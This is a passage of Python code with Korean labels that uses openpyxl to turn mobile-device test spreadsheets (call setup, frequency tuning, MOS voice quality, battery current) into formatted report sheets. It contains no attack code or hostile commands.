call_val\n                sheet_out['D4'] = '-'\n\n                self.setPrintText('/s {}번 파일 \"Call Setup Test\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:D4\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n                    # top alignment adjust\n                    sheet_out['A2'].alignment = self.top_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A3:D4\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A2:D4\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n                    # each column width adjust\n                    sheet_cell_list = ['A', 'B', 'C', 'D']\n                    sheet_width_list = [25, 15.88, 17, 15]\n\n                    for i in range(len(sheet_cell_list)):\n                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n                    sheet_out.row_dimensions[1].height = 45\n\n                    # Set Pattern Fill\n                    sheet_out['A4'].fill = self.gray_fill\n\n                    for col in ['A', 'B', 'C', 'D']:\n                        sheet_out[col + '3'].fill = self.brown_fill\n\n                    sheet_out['B4'].fill = self.apricot_fill\n\n                self.currentRow = self.currentRow + 1\n                self.setPrintText('/s {}번 파일 \"Call Setup Test\" 시트 스타일 적용 완료 /e'.format(idx+1))\n                # save file\n                wb_output.save(self.list_out_files[idx])\n        except:\n            self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n            self.end_count = \"y\"\n            self.end_flag.emit()\n\n    # 주파수동조 Tab\n    def fre_generate_data(self):\n\n        try:\n            for idx, item in enumerate(self.list_files):\n\n                wb_input = openpyxl.load_workbook(item, data_only=True)\n                wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n                list_c1 = []\n                list_c2 = []\n                list_c3 = []\n                # get data from wb_input\n                sheet_in = wb_input['주파수동조']\n\n                for i in ['C', 'D', 'E', 'F']:\n                    list_c1.append(str(sheet_in[i + '5'].value))\n                    list_c1.append(str(sheet_in[i + '6'].value))\n                    list_c1.append(str(sheet_in[i + '7'].value))\n\n                for i in ['C', 'D']:\n                    list_c2.append(str(sheet_in[i + '11'].value))\n                    list_c2.append(str(sheet_in[i + '12'].value))\n                    list_c2.append(str(sheet_in[i + '13'].value))\n\n                for i in ['C', 'D', 'E', 'F']:\n                    list_c3.append(str(sheet_in[i + '17'].value))\n                    list_c3.append(str(sheet_in[i + '18'].value))\n                    list_c3.append(str(sheet_in[i + '19'].value))\n\n                # option setting wb.output\n                sheet_out = wb_output['주파수동조']\n\n                # sheet row 2 handle\n                sheet_out.merge_cells('A1:D1')\n                sheet_out['A1'] = '주파수동조 결과'\n\n                # 3~8 row\n                sheet_out['A3'] = '▣ LTE'\n                sheet_out.merge_cells('A4:B4')\n                sheet_out['A4'] = '지원 Band 및 정보'\n                sheet_out['C4'] = '측정결과'\n                sheet_out['D4'] = '비고'\n                i = 0\n                j = 0\n                while i < len(list_c1):\n\n                    sheet_out['A' + str(5 + j)] = list_c1[i]\n                    sheet_out['B' + str(5 + j)] = list_c1[i+1]\n                    sheet_out['C' + str(5 + j)] = list_c1[i+2]\n                    sheet_out['D' + str(5 + j)] = ''\n                    i = i + 3\n                    j = j + 1\n\n                # 10~13 row\n                sheet_out['A10'] = '▣ WCDMA'\n                sheet_out.merge_cells('A11:B11')\n                sheet_out['A11'] = '지원 Band 및 정보'\n                sheet_out['C11'] = '측정결과'\n                sheet_out['D11'] = '비고'\n                i = 0\n                j = 0\n                while i < len(list_c2):\n                    sheet_out['A' + str(12 + j)] = list_c2[i]\n                    sheet_out['B' + str(12 + j)] = list_c2[i + 1]\n                    sheet_out['C' + str(12 + j)] = list_c2[i + 2]\n                    sheet_out['D' + str(12 + j)] = ''\n                    i = i + 3\n                    j = j + 1\n\n                # 15~20 row\n                sheet_out['A15'] = '▣ GSM'\n                sheet_out.merge_cells('A16:B16')\n                sheet_out['A16'] = '지원 Band 및 정보'\n                sheet_out['C16'] = '측정결과'\n                sheet_out['D16'] = '비고'\n                i = 0\n                j = 0\n                while i < len(list_c3):\n                    sheet_out['A' + str(17 + j)] = list_c3[i]\n                    sheet_out['B' + str(17 + j)] = list_c3[i + 1]\n                    sheet_out['C' + str(17 + j)] = list_c3[i + 2]\n                    sheet_out['D' + str(17 + j)] = ''\n                    i = i + 3\n                    j = j + 1\n\n                self.setPrintText('/s {}번 파일 \"주파수동조\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:D20\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n                    # top alignment adjust\n                    sheet_out['A3'].alignment = self.top_alignment\n                    sheet_out['A10'].alignment = self.top_alignment\n                    sheet_out['A15'].alignment = self.top_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A4:D8\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A11:D13\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A16:D20\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A3:D20\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n                    # each column width adjust\n                    sheet_cell_list = ['A', 'B', 'C', 'D']\n                    sheet_width_list = [15.13, 24.5, 17, 15]\n\n                    for i in range(len(sheet_cell_list)):\n                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n                    
sheet_out.row_dimensions[1].height = 45\n\n                    # Set Pattern Fill\n                    for i in [5, 6, 7, 8, 12, 13, 17, 18, 19, 20]:\n                        sheet_out['A' + str(i)].fill = self.gray_fill\n                        sheet_out['B' + str(i)].fill = self.gray_fill\n\n                    for i in [4, 11, 16]:\n                        sheet_out['A' + str(i)].fill = self.brown_fill\n                        sheet_out['C' + str(i)].fill = self.brown_fill\n                        sheet_out['D' + str(i)].fill = self.brown_fill\n\n                self.currentRow = self.currentRow + 1\n                self.setPrintText('/s {}번 파일 \"주파수동조\" 시트 스타일 적용 완료 /e'.format(idx+1))\n                # save file\n                wb_output.save(self.list_out_files[idx])\n        except:\n            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n            self.end_count = \"y\"\n            self.end_flag.emit()\n\n    # MOS Tab\n    def mos_generate_data(self):\n\n        try:\n            for idx, item in enumerate(self.list_files):\n\n                wb_input = openpyxl.load_workbook(item, data_only=True)\n                wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n                list_val = []\n\n                # get data from wb_input\n                sheet_in = wb_input['MOS']\n                list_val.append(self.check_num(sheet_in['C6'].value))\n                list_val.append(self.check_num(sheet_in['D6'].value))\n                list_val.append(self.check_num(sheet_in['E6'].value))\n                list_val.append(self.check_num(sheet_in['F6'].value))\n\n                #option setting wb.output\n                sheet_out = wb_output['MOS']\n                # sheet row 1 handle\n                sheet_out.merge_cells('A1:D1')\n                sheet_out['A1'] = 'MOS 결과'\n\n                # sheet row 2 handle\n                sheet_out['A2'] = '- MOS 결과'\n                sheet_out['A3'] = '▣ POLQA_48K'\n\n                # 4~6 row\n                sheet_out['A4'] = '구분'\n                sheet_out['B4'] = '기준'\n                sheet_out['C4'] = '측정결과'\n                sheet_out['D4'] = '비교'\n                sheet_out['A5'] = 'Downlink MOS'\n                sheet_out['B5'] = '3.5 이상'\n                sheet_out['C5'] = list_val[0]\n                # sheet_out['D5'] = self.check_num(abs(round(abs(float(list_val[0])) - 3.5, 2)))\n                sheet_out['D5'] = self.cal_comparison(3.5, list_val[0])\n                sheet_out['A6'] = 'Uplink MOS'\n                sheet_out['B6'] = '3.5 이상'\n                sheet_out['C6'] = list_val[1]\n                # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_val[1])) - 3.5, 2)))\n                sheet_out['D6'] = self.cal_comparison(3.5, list_val[1])\n\n                # sheet row 8 handle\n                sheet_out['A8'] = '▣ POLQA_8K'\n\n                # 9~11 row\n                sheet_out['A9'] = '구분'\n                sheet_out['B9'] = '기준'\n                sheet_out['C9'] = '측정결과'\n                sheet_out['D9'] = '비교'\n                sheet_out['A10'] = 'Downlink MOS'\n                sheet_out['B10'] = '3.0 이상'\n                sheet_out['C10'] = list_val[2]\n                # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_val[2])) - 3.0, 2)))\n                sheet_out['D10'] = self.cal_comparison(3.0, list_val[2])\n                sheet_out['A11'] = 'Uplink MOS'\n                sheet_out['B11'] = '3.0 이상'\n                sheet_out['C11'] = list_val[3]\n                # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_val[3])) - 3.0, 2)))\n                sheet_out['D11'] = self.cal_comparison(3.0, list_val[3])\n\n                self.setPrintText('/s {}번 파일 \"MOS\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:D11\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n                    # top alignment adjust\n                    sheet_out['A2'].alignment = self.top_alignment\n                    sheet_out['A3'].alignment = self.top_alignment\n                    sheet_out['A8'].alignment = self.top_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A4:D6\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    for mCell in sheet_out[\"A9:D11\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A2:D11\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, 
color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 13.13]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 9]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 10, 11]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"MOS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # DOU Tab\n def dou_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n list_input = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_sum = list(range(4, 16))\n col_a = [1, 2, 4, 7, 13, 16, 17]\n col_b = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_c = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_d = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_e = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n i_sum = 0.0\n r_sum = 0.0\n t_sum = 0.0\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류(DOU)']\n temp_data = []\n for i in col_a:\n if i == 1:\n temp_data.append(str(sheet_in['A' + str(i)].value))\n else:\n temp_data.append(str(sheet_in['A' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_b:\n temp_data.append(str(sheet_in['B' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_c:\n temp_data.append(str(sheet_in['C' + str(i + 1)].value))\n if i in col_sum:\n if self.isNumber(sheet_in['C' + str(i + 1)].value):\n t_sum = t_sum + float(sheet_in['C' + str(i + 1)].value)\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_d:\n if i in col_sum:\n if self.isNumber(sheet_in['D' + str(i + 1)].value):\n i_sum = i_sum + float(sheet_in['D' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['D' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_e:\n if i in col_sum:\n if self.isNumber(sheet_in['E' + str(i + 1)].value):\n r_sum = r_sum + float(sheet_in['E' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['E' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n list_input.append(temp_data)\n\n # input the data on output sheet\n sheet_out = wb_output['배터리소모전류(DOU)']\n\n for idx_2, item2 in enumerate(list_input):\n\n if idx_2 == 0:\n for i in range(len(item2)):\n sheet_out['A'+str(col_a[i])] = item2[i]\n elif idx_2 == 1:\n for i in range(len(item2)):\n sheet_out['B'+str(col_b[i])] = item2[i]\n elif idx_2 == 2:\n for i in range(len(item2)):\n sheet_out['C'+str(col_c[i])] = item2[i]\n elif idx_2 == 3:\n for i in range(len(item2)):\n 
sheet_out['D'+str(col_d[i])] = item2[i]\n                    else:\n                        for i in range(len(item2)):\n                            sheet_out['E'+str(col_e[i])] = item2[i]\n\n                # fill rest values\n                sheet_out.merge_cells('A1:E1')\n                sheet_out.merge_cells('A2:A3')\n                sheet_out.merge_cells('B2:B3')\n                sheet_out.merge_cells('C2:C3')\n                sheet_out.merge_cells('D2:E2')\n                sheet_out.merge_cells('A4:A6')\n                sheet_out.merge_cells('A7:A12')\n                sheet_out.merge_cells('A13:A15')\n                sheet_out.merge_cells('A16:B16')\n                sheet_out.merge_cells('A17:C17')\n                sheet_out.merge_cells('D17:E17')\n\n                sheet_out['A16'] = '소계'\n                if str(t_sum) == '0' or str(t_sum) == '0.0':\n                    sheet_out['C16'] = ''\n                else:\n                    sheet_out['C16'] = round(t_sum, 1)\n\n                if str(r_sum) == '0' or str(r_sum) == '0.0':\n                    sheet_out['E16'] = ''\n                else:\n                    sheet_out['E16'] = round(r_sum, 1)\n\n                if str(i_sum) == '0' or str(i_sum) == '0.0':\n                    sheet_out['D16'] = ''\n                else:\n                    sheet_out['D16'] = round(i_sum, 1)\n\n                sheet_out['A17'] = '사용시간'\n                # r_sum stays 0.0 when column E held no numeric data; guard the division below\n                if r_sum != 0:\n                    sheet_out['D17'] = str(round(self.battery_spec/r_sum, 2))+\"일\"\n                else:\n                    sheet_out['D17'] = ''\n\n                self.setPrintText('/s {}번 파일 \"배터리소모전류(DOU)\" 데이터 입력 완료 /e'.format(idx+1))\n\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:E17\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A2:E17\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A2:E17\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n                    # each column width adjust\n                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n                    sheet_width_list = [10.25, 27.38, 15.5, 17, 17]\n\n                    for i in range(len(sheet_cell_list)):\n                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n                    sheet_out.row_dimensions[1].height = 45\n\n                    # Set Pattern Fill\n                    sheet_out['A2'].fill = self.brown_fill\n                    sheet_out['B2'].fill = self.brown_fill\n                    sheet_out['C2'].fill = self.brown_fill\n                    sheet_out['D2'].fill = self.brown_fill\n                    sheet_out['D3'].fill = self.brown_fill\n                    sheet_out['E3'].fill = self.brown_fill\n                    sheet_out['A16'].fill = self.light_brown_fill\n                    sheet_out['C16'].fill = self.light_brown_fill\n                    sheet_out['D16'].fill = self.light_brown_fill\n                    sheet_out['E16'].fill = self.light_brown_fill\n                    sheet_out['A17'].fill = self.brown_fill\n                    sheet_out['D17'].fill = self.brown_fill\n\n                    for i in range(4, 16):\n                        sheet_out['A' + str(i)].fill = self.gray_fill\n                        sheet_out['B' + str(i)].fill = self.gray_fill\n                        sheet_out['C' + str(i)].fill = self.gray_fill\n\n                self.currentRow = self.currentRow + 1\n                self.setPrintText('/s {}번 파일 \"배터리소모전류(DOU)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n                # save file\n                wb_output.save(self.list_out_files[idx])\n        except:\n            self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류 Tab\n def bat_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_out = ['Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB']\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류 세부데이터']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:P1')\n sheet_out['A1'] = '베터리소모전류 결과'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G 측정내역'\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '차수'\n sheet_out.merge_cells('B4:B5')\n sheet_out['B4'] = '시료번호'\n sheet_out.merge_cells('C4:C5')\n sheet_out['C4'] = '베터리용량'\n sheet_out.merge_cells('D4:D5')\n sheet_out['D4'] = '측정채널'\n sheet_out.merge_cells('E4:H4')\n sheet_out['E4'] = sheet_in['E8'].value\n sheet_out.merge_cells('I4:L4')\n sheet_out['I4'] = sheet_in['I8'].value\n sheet_out.merge_cells('M4:P4')\n sheet_out['M4'] = sheet_in['M8'].value\n\n sheet_out.merge_cells('E5:F5')\n sheet_out['E5'] = sheet_in['E9'].value\n sheet_out.merge_cells('G5:H5')\n sheet_out['G5'] = sheet_in['G9'].value\n sheet_out.merge_cells('I5:J5')\n sheet_out['I5'] = sheet_in['I9'].value\n sheet_out.merge_cells('K5:L5')\n sheet_out['K5'] = sheet_in['K9'].value\n sheet_out.merge_cells('M5:N5')\n sheet_out['M5'] = sheet_in['M9'].value\n sheet_out.merge_cells('O5:P5')\n sheet_out['O5'] = sheet_in['O9'].value\n\n # sheet row 6~7 handle\n sheet_out.merge_cells('A6:D7')\n sheet_out['A6'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '6'] = sheet_in[col+'10'].value\n sheet_out[col + '7'] = sheet_in[col+'11'].value\n\n # sheet row 8~9 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '8'] = sheet_in[col + '12'].value\n sheet_out[col + '9'] = sheet_in[col + '13'].value\n else:\n # row 8\n if self.isNumber(sheet_in[col + '12'].value):\n sheet_out[col + '8'] = self.check_num(round(float(sheet_in[col + '12'].value), 2))\n else:\n sheet_out[col + '8'] = self.check_empty(sheet_in[col + '12'].value)\n\n # row 9\n if self.isNumber(sheet_in[col + '13'].value):\n sheet_out[col + '9'] = self.check_num(round(float(sheet_in[col + '13'].value), 2))\n else:\n sheet_out[col + '9'] = self.check_empty(sheet_in[col + '13'].value)\n\n # sheet row 12~15 handle\n sheet_out.merge_cells('A10:A11')\n sheet_out['A10'] = '차수'\n sheet_out.merge_cells('B10:B11')\n sheet_out['B10'] = '시료번호'\n sheet_out.merge_cells('C10:C11')\n sheet_out['C10'] = '베터리용량'\n sheet_out.merge_cells('D10:D11')\n sheet_out['D10'] = '측정채널'\n\n sheet_out.merge_cells('E10:F10')\n sheet_out['E10'] = sheet_in['Q8'].value\n sheet_out.merge_cells('G10:H10')\n sheet_out['G10'] = sheet_in['S8'].value\n sheet_out.merge_cells('I10:J10')\n sheet_out['I10'] = sheet_in['U8'].value\n sheet_out.merge_cells('K10:L10')\n sheet_out['K10'] = sheet_in['W8'].value\n sheet_out.merge_cells('M10:N10')\n sheet_out['M10'] = sheet_in['Y8'].value\n sheet_out.merge_cells('O10:P10')\n sheet_out['O10'] = sheet_in['AA8'].value\n\n sheet_out.merge_cells('E11:F11')\n sheet_out['E11'] = sheet_in['Q9'].value\n sheet_out.merge_cells('G11:H11')\n sheet_out['G11'] = sheet_in['S9'].value\n sheet_out.merge_cells('I11:J11')\n 
sheet_out['I11'] = sheet_in['U9'].value\n sheet_out.merge_cells('K11:L11')\n sheet_out['K11'] = sheet_in['W9'].value\n sheet_out.merge_cells('M11:N11')\n sheet_out['M11'] = sheet_in['Y9'].value\n sheet_out.merge_cells('O11:P11')\n sheet_out['O11'] = sheet_in['AA9'].value\n\n # sheet row 12~13 handle\n sheet_out.merge_cells('A12:D13')\n sheet_out['A12'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n sheet_out[col + '12'] = sheet_in[col_out[i] + '10'].value\n sheet_out[col + '13'] = sheet_in[col_out[i] + '11'].value\n\n # sheet row 14~15 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '14'] = sheet_in[col + '12'].value\n sheet_out[col + '15'] = sheet_in[col + '13'].value\n else:\n # row 14\n if self.isNumber(sheet_in[col_out[i-4] + '12'].value):\n sheet_out[col + '14'] = self.check_num(round(float(sheet_in[col_out[i-4] + '12'].value), 2))\n else:\n sheet_out[col + '14'] = self.check_empty(sheet_in[col_out[i-4] + '12'].value)\n\n # row 15\n if self.isNumber(sheet_in[col_out[i-4] + '13'].value):\n sheet_out[col + '15'] = self.check_num(round(float(sheet_in[col_out[i-4] + '13'].value), 2))\n else:\n sheet_out[col + '15'] = self.check_empty(sheet_in[col_out[i-4] + '13'].value)\n\n # sheet row 17~19 handle\n sheet_out['A17'] = '▣ LTE 측정내역'\n sheet_out.merge_cells('A18:A19')\n sheet_out['A18'] = '차수'\n sheet_out.merge_cells('B18:B19')\n sheet_out['B18'] = '시료번호'\n sheet_out.merge_cells('C18:C19')\n sheet_out['C18'] = '베터리용량'\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = '측정채널'\n sheet_out.merge_cells('E18:H18')\n sheet_out['E18'] = sheet_in['E16'].value\n sheet_out.merge_cells('I18:L18')\n sheet_out['I18'] = sheet_in['I16'].value\n sheet_out.merge_cells('M18:P18')\n sheet_out['M18'] = sheet_in['M16'].value\n\n sheet_out.merge_cells('E19:F19')\n sheet_out['E19'] = sheet_in['E17'].value\n sheet_out.merge_cells('G19:H19')\n sheet_out['G19'] = sheet_in['G17'].value\n sheet_out.merge_cells('I19:J19')\n sheet_out['I19'] = sheet_in['I17'].value\n sheet_out.merge_cells('K19:L19')\n sheet_out['K19'] = sheet_in['K17'].value\n sheet_out.merge_cells('M19:N19')\n sheet_out['M19'] = sheet_in['M17'].value\n sheet_out.merge_cells('O19:P19')\n sheet_out['O19'] = sheet_in['O17'].value\n\n # sheet row 20~21 handle\n sheet_out.merge_cells('A20:D21')\n sheet_out['A20'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '20'] = sheet_in[col+'18'].value\n sheet_out[col + '21'] = sheet_in[col+'19'].value\n\n # sheet row 22~23 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '22'] = sheet_in[col + '12'].value\n sheet_out[col + '23'] = sheet_in[col + '13'].value\n else:\n # row 22\n if self.isNumber(sheet_in[col + '20'].value):\n sheet_out[col + '22'] = self.check_num(round(float(sheet_in[col + '20'].value), 2))\n else:\n sheet_out[col + '22'] = self.check_empty(sheet_in[col + '20'].value)\n\n # row 23\n if self.isNumber(sheet_in[col + '21'].value):\n sheet_out[col + '23'] = self.check_num(round(float(sheet_in[col + '21'].value), 2))\n else:\n sheet_out[col + '23'] = self.check_empty(sheet_in[col + '21'].value)\n\n # sheet row 24~25 handle\n sheet_out.merge_cells('A24:A25')\n sheet_out['A24'] = '차수'\n sheet_out.merge_cells('B24:B25')\n sheet_out['B24'] = '시료번호'\n 
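# note: rows 24~25 repeat the LTE header for the remaining measurement channels (input columns Q~W)\n                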
sheet_out.merge_cells('C24:C25')\n sheet_out['C24'] = '베터리용량'\n sheet_out.merge_cells('D24:D25')\n sheet_out['D24'] = '측정채널'\n\n sheet_out.merge_cells('E24:F24')\n sheet_out['E24'] = sheet_in['Q16'].value\n sheet_out.merge_cells('G24:H24')\n sheet_out['G24'] = sheet_in['S16'].value\n sheet_out.merge_cells('I24:J24')\n sheet_out['I24'] = sheet_in['U16'].value\n sheet_out.merge_cells('K24:L24')\n sheet_out['K24'] = sheet_in['W16'].value\n\n sheet_out.merge_cells('E25:F25')\n sheet_out['E25'] = sheet_in['Q17'].value\n sheet_out.merge_cells('G25:H25')\n sheet_out['G25'] = sheet_in['S17'].value\n sheet_out.merge_cells('I25:J25')\n sheet_out['I25'] = sheet_in['U17'].value\n sheet_out.merge_cells('K25:L25')\n sheet_out['K25'] = sheet_in['W17'].value\n\n # sheet row 26~27 handle\n sheet_out.merge_cells('A26:D27')\n sheet_out['A26'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n sheet_out[col + '26'] = sheet_in[col_out[i] + '18'].value\n sheet_out[col + '27'] = sheet_in[col_out[i] + '19'].value\n\n # sheet row 28~29 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '28'] = sheet_in[col + '12'].value\n sheet_out[col + '29'] = sheet_in[col + '13'].value\n else:\n # row 28\n if self.isNumber(sheet_in[col_out[i-4] + '20'].value):\n sheet_out[col + '28'] = self.check_num(round(float(sheet_in[col_out[i-4] + '20'].value), 2))\n else:\n sheet_out[col + '28'] = self.check_empty(sheet_in[col_out[i-4] + '20'].value)\n # row 29\n if self.isNumber(sheet_in[col_out[i-4] + '21'].value):\n sheet_out[col + '29'] = self.check_num(round(float(sheet_in[col_out[i-4] + '21'].value), 2))\n else:\n sheet_out[col + '29'] = self.check_empty(sheet_in[col_out[i-4] + '21'].value)\n\n\n # sheet row 31~33 handle\n sheet_out['A31'] = '▣ WCDMA 측정내역'\n sheet_out.merge_cells('A32:A33')\n sheet_out['A32'] = '차수'\n sheet_out.merge_cells('B32:B33')\n sheet_out['B32'] = '시료번호'\n sheet_out.merge_cells('C32:C33')\n sheet_out['C32'] = '베터리용량'\n sheet_out.merge_cells('D32:D33')\n sheet_out['D32'] = '측정채널'\n\n sheet_out.merge_cells('E32:F32')\n sheet_out['E32'] = sheet_in['E24'].value\n sheet_out.merge_cells('G32:J32')\n sheet_out['G32'] = sheet_in['G24'].value\n sheet_out.merge_cells('K32:L32')\n sheet_out['K32'] = sheet_in['K24'].value\n\n sheet_out.merge_cells('E33:F33')\n sheet_out['E33'] = sheet_in['E25'].value\n sheet_out.merge_cells('G33:H33')\n sheet_out['G33'] = sheet_in['G25'].value\n sheet_out.merge_cells('I33:J33')\n sheet_out['I33'] = sheet_in['I25'].value\n sheet_out.merge_cells('K33:L33')\n sheet_out['K33'] = sheet_in['K25'].value\n\n # sheet row 34~35 handle\n sheet_out.merge_cells('A34:D35')\n sheet_out['A34'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n sheet_out[col + '34'] = sheet_in[col+'26'].value\n sheet_out[col + '35'] = sheet_in[col+'27'].value\n\n # sheet row 36~37 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '36'] = sheet_in[col + '12'].value\n sheet_out[col + '37'] = sheet_in[col + '13'].value\n else:\n # row 36\n if self.isNumber(sheet_in[col + '28'].value):\n sheet_out[col + '36'] = self.check_num(round(float(sheet_in[col + '28'].value), 2))\n else:\n sheet_out[col + '36'] = self.check_empty(sheet_in[col + '28'].value)\n # row 37\n if self.isNumber(sheet_in[col + '29'].value):\n sheet_out[col + '37'] = self.check_num(round(float(sheet_in[col + '29'].value), 2))\n 
